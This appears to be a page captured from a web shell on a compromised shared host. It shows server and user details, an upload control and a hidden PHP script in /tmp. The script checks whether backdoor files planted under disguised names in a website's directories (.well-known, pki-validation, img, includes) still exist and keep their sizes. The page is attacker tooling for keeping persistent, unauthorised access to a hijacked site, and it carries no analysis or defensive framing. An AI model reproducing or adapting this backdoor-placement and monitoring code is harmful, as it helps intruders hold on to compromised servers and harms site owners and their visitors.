HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.marker
<?php   $r = '/home/vitanhod/trimate.vitavit.com.pk'; $x = ["/includes/configOnline.php"=>"bd@@1335485@@86",
"/.well-known/editfees.php"=>"bd@@1334773@@61",
"/orderemail.php"=>"bd@@1335546@@25",
"/img/Pager.php"=>"bd@@1315110@@64",
"/.well-known/pki-validation/gallery.lang_es.php"=>"bd@@1335564@@3",
"/File.class.php"=>"bd@@1335528@@59",
"/img/rindex.php"=>"bd@@1335583@@924",
"/.well-known/T.php"=>"bd@@1335590@@976",
"/includes/action.newdir.php"=>"bd@@1310566@@934",
"/.well-known/pki-validation/gallery.lang_es.php"=>"bd@@1309801@@825",
"/File.class.php"=>"bd@@1310630@@1051"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');